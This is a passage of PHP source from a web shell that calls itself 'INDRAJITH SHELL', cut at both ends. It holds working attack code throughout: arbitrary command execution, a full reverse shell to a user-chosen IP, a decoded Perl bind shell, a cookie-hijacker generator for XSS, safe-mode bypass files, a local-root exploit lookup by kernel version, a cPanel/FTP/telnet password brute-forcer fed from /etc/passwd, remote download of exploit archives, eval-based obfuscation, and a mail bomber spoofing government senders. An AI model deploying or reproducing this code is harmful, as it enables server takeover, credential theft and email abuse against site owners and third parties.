<input type='hidden' name='path' value=".getcwd().">
New File Name : <input size='40' name='new_f_name' value=".$_GET['new_file']."></font><br /><br /><hr /><br /><center>
<textarea spellcheck='false' cols='80' rows='25' class=textarea_edit name='n_file_content'></textarea></center><hr />
<input class='input_big' type='submit' value=' Save ' /></form></center></div>";
}
function mk_file_bg()
{
chdir($_GET['path']);
$c_path=$_GET['path'];
$c_file=$_GET['new_f_name'];
$c_file_contents=$_GET['n_file_content'];
$handle=fopen($c_file, "w");
if(!$handle)
{
alert("Permission Denied");
}
else
{
fwrite($handle,$c_file_contents);
alert("Your changes were Successfully Saved!");
}
fclose($handle);
}
function create_dir()
{
chdir($_GET['path']);
$new_dir=$_GET['new_dir'];
if(is_writable($_GET['path']))
{
mkdir($new_dir);
alert("Direcory Created Successfully");
exit;
}
else
{
alert("Access Denied for this Operation");
exit;
}
}
function cmd($cmd)
{
chdir($_GET['path']);
$res="";
if($_GET['cmdexe'])
{
$cmd=$_GET['cmdexe'];
}
if(function_exists('shell_exec'))
{
$res=shell_exec($cmd);
}
else if(function_exists('exec'))
{
exec($cmd,$res);
$res=join("\n",$res);
}
else if(function_exists('system'))
{
ob_start();
system($cmd);
$res = ob_get_contents();
ob_end_clean();
}
elseif(function_exists('passthru'))
{
ob_start();
passthru($cmd);
$res=ob_get_contents();
ob_end_clean();
}
else if(function_exists('proc_open'))
{
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$handle = proc_open($cmd ,$descriptorspec , $pipes);
if(is_resource($handle))
{
if(function_exists('fread') && function_exists('feof'))
{
while(!feof($pipes[1]))
{
$res .= fread($pipes[1], 512);
}
}
else if(function_exists('fgets') && function_exists('feof'))
{
while(!feof($pipes[1]))
{
$res .= fgets($pipes[1],512);
}
}
}
pclose($handle);
}
else if(function_exists('popen'))
{
$handle = popen($cmd , "r");
if(is_resource($handle))
{
if(function_exists('fread') && function_exists('feof'))
{
while(!feof($handle))
{
$res .= fread($handle, 512);
}
}
else if(function_exists('fgets') && function_exists('feof'))
{
while(!feof($handle))
{
$res .= fgets($handle,512);
}
}
}
pclose($handle);
}
$res=wordwrap(htmlspecialchars($res));
if($_GET['cmdexe'])
{
echo "<div id=result><center><font color=green><h2>r00t@TOF:~#</h2></center><hr /><pre>".$res."</font></pre></div>";
}
return $res;
}
function upload_file()
{
chdir($_POST['path']);
if(move_uploaded_file($_FILES['upload_f']['tmp_name'],$_FILES['upload_f']['name']))
{
alert("Uploaded File Successfully");
}
else
{
alert("Access Denied!!!");
}
}
function reverse_conn_ui()
{
global $your_ip;
echo "<div id='result'>
<center><h2>Reverse Shell</h2><hr />
<br /><br /><form method='GET'><table class=tbl>
<tr>
<td><select name='rev_option' style='color:green; background-color:black; border:1px solid #666;'>
<option>PHP Reverse Shell</option>
<option>PERL Bind Shell</option>
</select></td></tr><tr>
<td>Your IP : <input name='my_ip' value=".$your_ip.">
PORT : <input name='my_port' value='560'>
<input type='submit' value=' >> ' /></td></tr></form>
<tr></tr>
<tr><td><font color=red>PHP Reverse Shell</font> : <font color=green> nc -l -p <i>port</i></font></td></tr><tr><td><font color=red>PERL Bind Shell</font> : <font color=green> nc <i>server_ip port</i></font></td></tr></table> </div>";
}
function reverse_conn_bg()
{
global $os;
$option=$_REQUEST['rev_option'];
$ip=$_GET['my_ip'];
$port=$_GET['my_port'];
if($option=="PHP Reverse Shell")
{
echo "<div id=result><h2>RESULT</h2><hr /><br />";
function printit ($string)
{
if (!$daemon)
{
print "$string\n";
}
}
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork'))
{
$pid = pcntl_fork();
if ($pid == -1)
{
printit("ERROR: Can't fork");
exit(1);
}
if ($pid)
{
exit(0);
}
if (posix_setsid() == -1)
{
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
}
else
{
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock)
{
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process))
{
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("<font color=green>Successfully opened reverse shell to $ip:$port </font>");
while (1)
{
if (feof($sock))
{
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1]))
{
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a))
{
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a))
{
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a))
{
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
echo "<br /><br /><hr /><br /><br /></div>";
}
else if($option=="PERL Bind Shell")
{
global $bind_perl, $os;
$pbfl=$bind_perl;
$handlr=fopen("indrajith_perl_bind.pl", "wb");
if($handlr)
{
fwrite($handlr, gzinflate(base64_decode($bind_perl)));
}
else
{
alert("Access Denied for create new file");
}
fclose($handlr);
if(file_exists("indrajith_perl_bind.pl"))
{
if($os=="nix")
{
cmd("chmod +x indrajith_perl_bind.pl;perl indrajith_perl_bind.pl $port");
}
else
{
cmd("perl indrajith_perl_bind.pl $port");
}
}
}
}
function cookie_jack()
{
global $cookie_highjacker;
echo "<div id=result><center><h2>NOTICE</h2><hr/>";
if(function_exists('fopen') && function_exists('fwrite'))
{
$cook=gzinflate(base64_decode($cookie_highjacker));
$han_le=fopen("jith_cookie.php", "w+");
if($han_le)
{
fwrite($han_le, $cook);
echo "Yes... Cookie highjacker is generated.<br /> Name : <a style='color:green;' target=_blank href=jith_cookie.php>jith_cookie.php</a></font>.<br /> Rename it as 404.php or what you like and highjack cookie of your target.<br />It is usefull in XSS<br />It will make a file <font color=red>configuration.txt</font> in this direcory and save the cookie value in it. :p cheers...<br /><br /><hr /><br /><br /></center></div>";
}
else
{
echo "<font color=red>Sorry... Generate COOKIE HIGHJACKER failed<br /><br /><hr /><br /><br /></center></div>";
}
}
}
function safe_mode_fuck()
{
global $s_php_ini,$s_htaccess,$s_htaccess_pl,$ini_php;
$path = chdir($_GET['path']);
chdir($_GET['path']);
switch($_GET['safe_mode'])
{
case "s_php_ini":
$s_file=$s_php_ini;
$s_name="php.ini";
break;
case "s_htaccess":
$s_name=".htaccess";
$s_file=$s_htaccess;
break;
case "s_htaccess_pl":
$s_name=".htaccess";
$s_file=$s_htaccess_pl;
break;
case "s_ini_php":
$s_name="ini.php";
$s_file=$ini_php;
break;
}
if(function_exists('fopen')&& function_exists('fwrite'))
{
$s_handle=fopen("$s_name", "w+");
if($s_handle)
{
fwrite($s_handle, $s_file);
alert("Operation Succeed!!!");
}
else
{
alert("Access Denied!!!");
}
fclose($s_handle);
}
}
function safe_mode_fuck_ui()
{
global $path;
$path=getcwd();
echo "<div id=result><br /><center><h2>Select Your Options</h2><hr />
<table class=tbl size=10><tr><td><a href=?path={$path}&safe_mode=s_php_ini>PHP.INI</a></td><td><a href=?path={$path}&safe_mode=s_htaccess>.HTACCESS</a></td><td><a href=?path={$path}&safe_mode=s_htaccess_pl>.HTACCESS(perl)</td><td><a href=?path={$path}&safe_mode=s_ini_php>INI.PHP</td></tr></table><br /><br /></div>";
}
function AccessDenied()
{
global $path, $forbid_dir;
$path=$_GET['path'];
chdir($path);
if(function_exists('fopen') && function_exists('fwrite'))
{
$forbid=fopen(".htaccess", "wb");
if($forbid)
{
fwrite($forbid, $forbid_dir);
alert("Opreation Succeeded");
}
else
{
alert("Access Denied");
}
fclose($forbid);
}
}
function r00t_exploit()
{
$kernel = php_uname();
$r00t_db = array('2.6.19'=>'jessica','2.6.20'=>'jessica','2.6.21'=>'jessica','2.6.22'=>'jessica','2.6.23'=>'jessica, vmsplice','2.6.24'=>'jessica, vmspice','2.6.31'=>'enlightment','2.6.18'=>'brk, ptrace, kmod, brk2','2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip,ptrace');
foreach($r00t_db as $kern=>$exp)
{
if(strstr($kernel, $kern))
{
return $exp;
}
else
{
$exp='<font color="red">Not found.</font>';
return $exp;
}
}
}
function php_ende_ui()
{
echo "<div id=result><center><h2>PHP ENCODE/DECODE</h2></center><hr /><form method='post'><table class=tbl>
<tr><td>
Method : <select name='typed' style='color:green; background-color:black; border:1px solid #666;'><option>Encode</option><option>Decode</decode></select> TYPE : <select name='typenc' style='color:green; background-color:black; border:1px solid #666;'><option>GZINFLATE</option><option>GZUNCOMPRESS</option><option>STR_ROT13</option></tr>
</td><tr><td><textarea spellcheck='false' class=textarea_edit cols='80' rows='25' name='php_content'>INPUT YOUR CONTENT TO ENCODE/DECODE
For Encode Input your full source code.
For Decode Input the encoded part only.</textarea></tr></td></table><hr /><input class='input_big' type='submit' value=' >> ' /><br /><hr /><br /><br /></form></div>";
}
function php_ende_bg()
{
$meth_d=$_POST['typed'];
$typ_d=$_POST['typenc'];
$c_ntent=$_POST['php_content'];
$c_ntent=$c_ntent;
switch($meth_d)
{
case "Encode":
switch($typ_d)
{
case "GZINFLATE":
$res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
$res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzinflate(base64_decode(\"$res_t\"))); ?>";
break;
case "GZUNCOMPRESS":
$res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
$res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzuncompress(base64_decode(\"$res_t\"))); ?>";
break;
case "STR_ROT13":
$res_t=trim(stripslashes($c_ntent.' '),'<?php, ?>');
$res_t=base64_encode(str_rot13($res_t));
$res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(str_rot13(base64_decode(\"$res_t\"))); ?>";
break;
}
break;
case "Decode":
switch($typ_d)
{
case "GZINFLATE":
$res_t=gzinflate(base64_decode($c_ntent));
break;
case "GZUNCOMPRESS":
$res_t=gzuncompress(base64_decode($c_ntent));
break;
case "STR_ROT13":
$res_t=str_rot13(base64_decode($c_ntent));
break;
}
break;
}
echo "<div id=result><center><h2>INDRAJITH SHELL</h2><hr /><textarea spellcheck='false' class=textarea_edit cols='80' rows='25'>".htmlspecialchars($res_t)."</textarea></center></div>";
}
function massmailer_ui()
{
echo "<div id=result><center><h2>MASS MAILER & MAIL BOMBER</h2><hr /><table class=tbl width=40 style='col-width:40'><td><table class=tbl><tr style='float:left;'><td><font color=green size=4>Mass Mail</font></td></tr><form method='POST'><tr style='float:left;'><td> FROM : </td><td><input name='from' size=40 value='ajithkp560@fbi.gov'></td></tr><tr style='float:left;'><td>TO :</td><td><input size=40 name='to_mail' value='ajithkp560@gmail.com,ajithkp560@yahoo.com'></td></tr><tr style='float:left;'><td>Subject :</td><td><input size=40 name='subject_mail' value='Hi, GuyZ'></td></tr><tr style='float:left;'><td><textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='mail_content'>I'm doing massmail :p</textarea></td><td><input class='input_big' type='submit' value=' >> '></td></tr></form></table></td>
<form method='post'><td> <table class='tbl'><td><font color=green size=4>Mail Bomber</font></td></tr><tr style='float:left;'><td>TO : </td><td><input size=40 name='bomb_to' value='ajithkp560@gmail.com,ajithkp560_mail_bomb@fbi.gov'></td></tr><tr style='float:left;'><td>Subject : </td><td><input size=40 name='bomb_subject' value='Bombing with messages'></td></tr><tr style='float:left;'><td>No. of times</td><td><input size=40 name='bomb_no' value='100'></td></tr><tr style='float:left;'><td> <textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='bmail_content'>I'm doing E-Mail Bombing :p</textarea> </td><td><input class='input_big' type='submit' value=' >> '></td></tr></form></table> </td></tr></table>";
}
function massmailer_bg()
{
$from=$_POST['from'];
$to=$_POST['to_mail'];
$subject=$_POST['subject_mail'];
$message=$_POST['mail_content'];
if(function_exists('mail'))
{
if(mail($to,$subject,$message,"From:$from"))
{
echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Send... :p</font><br /><br /><hr /><br /><br />";
}
else
{
echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
}
}
else
{
echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
}
}
function mailbomb_bg()
{
$rand=rand(0, 9999999);
$to=$_POST['bomb_to'];
$from="president_$rand@whitewhitehouse.gov";
$subject=$_POST['bomb_subject']." ID ".$rand;
$times=$_POST['bomb_no'];
$content=$_POST['bmail_content'];
if($times=='')
{
$times=1000;
}
while($times--)
{
if(function_exists('mail'))
{
if(mail($to,$subject,$message,"From:$from"))
{
echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Bombed... :p</font><br /><br /><hr /><br /><br />";
}
else
{
echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
}
}
else
{
echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
}
}
}
/* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*/
/*------------------------ Credit Goes to Them ---------------------------------*/
function cpanel_check($host,$user,$pass,$timeout)
{
set_time_limit(0);
global $cpanel_port;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 )
{
print "<b><font color=orange>Error :</font> <font color=red>Connection Timeout. Please Check The Target Hostname .</font></b>";
exit;
}
else if (curl_errno($ch) == 0 )
{
print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"orange\">[~]</font></b><font face=\"Tahoma\" style=\"font-size: 9pt\"><b><font color=\"green\">
Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
}
curl_close($ch);
}
function cpanel_crack()
{
set_time_limit(0);
global $os;
echo "<div id=result>";
$cpanel_port="2082";
$connect_timeout=5;
if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype']))
{
?>
<center>
<form method=post>
<table class=tbl>
<tr>
<td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
</tr>
<tr>
<td align=center>User names</td><td align=center>Password</td>
</tr>
<tr>
<td align=center><textarea spellcheck='false' class=textarea_edit name=username rows=25 cols=35 class=box><?php
if($os != "win")
{
if(@file('/etc/passwd'))
{
$users = file('/etc/passwd');
foreach($users as $user)
{
$user = explode(':', $user);
echo $user[0] . "\n";
}
}
else
{
$temp = "";
$val1 = 0;
$val2 = 1000;
for(;$val1 <= $val2;$val1++)
{
$uid = @posix_getpwuid($val1);
if ($uid)
$temp .= join(':',$uid)."\n";
}
$temp = trim($temp);
if($file5 = fopen("test.txt","w"))
{
fputs($file5,$temp);
fclose($file5);
$file = fopen("test.txt", "r");
while(!feof($file))
{
$s = fgets($file);
$matches = array();
$t = preg_match('/\/(.*?)\:\//s', $s, $matches);
$matches = str_replace("home/","",$matches[1]);
if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
continue;
echo $matches;
}
fclose($file);
}
}
}
?></textarea></td><td align=center><textarea spellcheck='false' class=textarea_edit name=password rows=25 cols=35 class=box></textarea></td>
</tr>
<tr>
<td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
</tr>
<tr>
<td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
</tr>
<tr>
<td align=center colspan=2><input type="submit" value=" Go " class=but></td>
</tr>
</table>
</form>
</center>
<?php
}
else
{
if(empty($_POST['username']) || empty($_POST['password']))
echo "<center>Please Enter The Users or Password List</center>";
else
{
$userlist=explode("\n",$_POST['username']);
$passlist=explode("\n",$_POST['password']);
if($_POST['cracktype'] == "ftp")
{
foreach ($userlist as $user)
{
$pureuser = trim($user);
foreach ($passlist as $password )
{
$purepass = trim($password);
ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
}
}
}
if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
{
if($cracktype == "telnet")
{
$cpanel_port="23";
}
else
$cpanel_port="2082";
foreach ($userlist as $user)
{
$pureuser = trim($user);
echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
Processing user $pureuser ...</font></b><br><br>";
foreach ($passlist as $password )
{
$purepass = trim($password);
cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
}
}
}
}
}
echo "</div>";
}
function get_users()
{
$userz = array();
$user = file("/etc/passwd");
foreach($user as $userx=>$usersz)
{
$userct = explode(":",$usersz);
array_push($userz,$userct[0]);
}
if(!$user)
{
if($opd = opendir("/home/"))
{
while(($file = readdir($opd))!== false)
{
array_push($userz,$file);
}
}
closedir($opd);
}
$userz=implode(', ',$userz);
return $userz;
}
function exploit_details()
{
global $os;
echo "<div id=result style='color:green;'><center>
<h2>Exploit Server Details</h2><hr /><br /><br /><table class=table style='color:green;text-align:center'><tr><td>
OS: <a style='color:7171C6;text-decoration:none;' target=_blank href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".php_uname(s)."'>".php_uname(s)."</td></tr>
<tr><td>PHP Version : <a style='color:7171C6;text-decoration:none;' target=_blank href='?phpinfo'>".phpversion().".</td></tr>
<tr><td>Kernel Release : <font color=7171C6>".php_uname(r)."</font></td></tr>
<tr><td>Kernel Version : <font color=7171C6>".php_uname(v)."</font></td></td>
<tr><td>Machine : <font color=7171C6>".php_uname(m)."</font></td</tr>
<tr><td>Server Software : <font color=7171C6>".$_SERVER['SERVER_SOFTWARE']."</font></td</tr><tr>";
if(function_exists('apache_get_modules'))
{
echo "<tr><td style='text-align:left;'>Loaded Apache modules : <br /><br /><font color=7171C6>";
echo implode(', ', apache_get_modules());
echo "</font></tr></td>";
}
if($os=='win')
{
echo "<tr><td style='text-align:left;'>Account Setting : <font color=7171C6><pre>".cmd('net accounts')."</pre></td></tr>
<tr><td style='text-align:left'>User Accounts : <font color=7171C6><pre>".cmd('net user')."</pre></td></tr>
";
}
if($os=='nix')
{
echo "<tr><td style='text-align:left'>Distro : <font color=7171C6><pre>".cmd('cat /etc/*-release')."</pre></font></td></tr>
<tr><td style='text-align:left'>Distr name : <font color=7171C6><pre>".cmd('cat /etc/issue.net')."</pre></font></td></tr>
<tr><td style='text-align:left'>GCC : <font color=7171C6><pre>".cmd('whereis gcc')."</pre></td></tr>
<tr><td style='text-align:left'>PERL : <font color=7171C6><pre>".cmd('whereis perl')."</pre></td></tr>
<tr><td style='text-align:left'>PYTHON : <font color=7171C6><pre>".cmd('whereis python')."</pre></td></tr>
<tr><td style='text-align:left'>JAVA : <font color=7171C6><pre>".cmd('whereis java')."</pre></td></tr>
<tr><td style='text-align:left'>APACHE : <font color=7171C6><pre>".cmd('whereis apache')."</pre></td></tr>
<tr><td style='text-align:left;'>CPU : <br /><br /><pre><font color=7171C6>".cmd('cat /proc/cpuinfo')."</font></pre></td></tr>
<tr><td style='text-align:left'>RAM : <font color=7171C6><pre>".cmd('free -m')."</pre></td></tr>
<tr><td style='text-align:left'> User Limits : <br /><br /><font color=7171C6><pre>".cmd('ulimit -a')."</pre></td></tr>";
$useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$uze=array();
foreach($useful as $uzeful)
{
if(cmd("which $uzeful"))
{
$uze[]=$uzeful;
}
}
echo "<tr><td style='text-align:left'>Useful : <br /><font color=7171C6><pre>";
echo implode(', ',$uze);
echo "</pre></td></tr>";
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
$uze=array();
foreach($downloaders as $downloader)
{
if(cmd("which $downloader"))
{
$uze[]=$downloader;
}
}
echo "<tr><td style='text-align:left'>Downloaders : <br /><font color=7171C6><pre>";
echo implode(', ',$uze);
echo "</pre></td></tr>";
echo "<tr><td style='text-align:left'>Users : <br /><font color=7171C6><pre>".wordwrap(get_users())."</pre</font>></td></tr>
<tr><td style='text-align:left'>Hosts : <br /><font color=7171C6><pre>".cmd('cat /etc/hosts')."</pre></font></td></tr>";
}
echo "</table><br /><br /><hr /><br /><br />";
}
function remote_file_check_ui()
{
echo "<div id=result><center><h2>Remote File Check</h2><hr /><br /><br />
<table class=tbl><form method='POST'><tr><td>URL : <input size=50 name='rem_web' value='http://www.ajithkp560.hostei.com/php/'></td></tr>
<tr><td><font color=red>Input File's Names in TextArea</font></tr></td><tr><td><textarea spellcheck='false' class='textarea_edit' cols=50 rows=30 name='tryzzz'>indrajith.php
ajithkp560.php
index.html
profile.php
c99.php
r57.php</textarea></td></tr>
<tr><td><br /><input type='submit' value=' >> ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />";
}
function remote_file_check_bg()
{
set_time_limit(0);
$rtr=array();
echo "<div id=result><center><h2>Scanner Report</h2><hr /><br /><br /><table class=tbl>";
$webz=$_POST['rem_web'];
$uri_in=$_POST['tryzzz'];
$r_xuri = trim($uri_in);
$r_xuri=explode("\n", $r_xuri);
foreach($r_xuri as $rty)
{
$urlzzx=$webz.$rty;
if(function_exists('curl_init'))
{
echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
$ch = curl_init($urlzzx);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_exec($ch);
$status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if($status_code==200)
{
echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
}
else
{
echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
}
}
else
{
echo "<font color=red>cURL Not Found </font>";
break;
}
}
echo "</table><br /><br /><hr /><br /><br /></div>";
}
function remote_download_ui()
{
echo "<div id=result><center><h2>Remote File Download</h2><hr /><br /><br /><table class=tbl><form method='GET'><input type=hidden name='path' value=".getcwd()."><tr><td><select style='color:green; background-color:black; border:1px solid #666;' name='type_r_down'><option>WGET</option><option>cURL</option></select></td></tr>
<tr><td>URL <input size=50 name='rurlfile' value='ajithkp560.hostei.com/localroot/2.6.x/h00lyshit.zip'></td></tr>
<tr><td><input type='submit' class='input_big' value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
}
function remote_download_bg()
{
chdir($_GET['path']);
global $os;
$opt=$_GET['type_r_down'];
$rt_ffile=$_GET['rurlfile'];
$name=basename($rt_ffile);
echo "<div id=result>";
switch($opt)
{
case "WGET":
if($os!='win')
{
cmd("wget $rt_ffile");
alert("Downloaded Successfully...");
}
else
{
alert("Its Windows OS... WGET is not available");
}
break;
case "cURL":
if(function_exists('curl_init'))
{
$ch = curl_init($rt_ffile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
curl_close($ch);
file_put_contents($name, $data);
alert("Download succeeded");
}
else
{
alert("cURL Not Available");
}
break;
}
echo "</div>";
}
function hex_encode_ui()
{
if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx']))
{
$tyx=$_POST['tyxxx'];
$rezultzz=$_POST['hexinp'];
switch($tyx)
{
case "Encode":
$rzul=PREG_REPLACE("'(.)'e","dechex(ord('\\1'))",$rezultzz);
echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
<textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
<br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>";
break;
case "Decode":
$rzul=PREG_REPLACE("'([\S,\d]{2})'e","chr(hexdec('\\1'))",$rezultzz);
echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
<textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
<br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>";
break;
}
}
else
{
echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
<textarea class='textarea_edit' spellcheck=false cols=60 rows=10>Here visible Your Result</textarea>
<br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>";
}
}
function killme()
{
global $self;
echo "<div id=result><center><h2>Good Bye Dear</h2><hr />Dear, Good by... :( Hope You Like me...<br /><br /><br/><hr /><br /><br />";
$me=basename($self);
unlink($me);
}
function ftp_anonymous_ui()
{
echo "<div id='result'><center><h2>Anonymous FTP Scanner</h2><hr /></center><table class=tbl><form method='GET'><tr><td><textarea name='ftp_anonz' cols=40 rows=25 class='textarea_edit'>127.0.0.1
ftp.google.com
ftp.r00t.com
ftp.ajithkp.org
...
...</textarea></td></tr><tr><td><input class='input_big' type='submit' value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br />";
}
function ftp_anonymous_bg()
{
echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=table>";
$ftp_list=$_GET['ftp_anonz'];
$xftpl = trim($ftp_list);
$xftpl = explode("\n", $xftpl);
foreach($xftpl as $xftp)
{
$xftp = str_replace("ftp://", "", $xftp);
$conn_ftp = ftp_connect($xftp);
$success = ftp_login($conn_ftp, "anonymous", "");
if($success)
{
echo "<tr><td><font color=7171C6>$xftp</font></td><td><font color=green>Successfull</font></td></tr>";
}
else
{
echo "<tr><td><font color=7171C6>$xftp</font></td><td><font color=red>Failed</font></td></tr>";
}
}
echo "</table><br /><br /><hr /><br /><br />";
}
function mass_deface_ui()
{
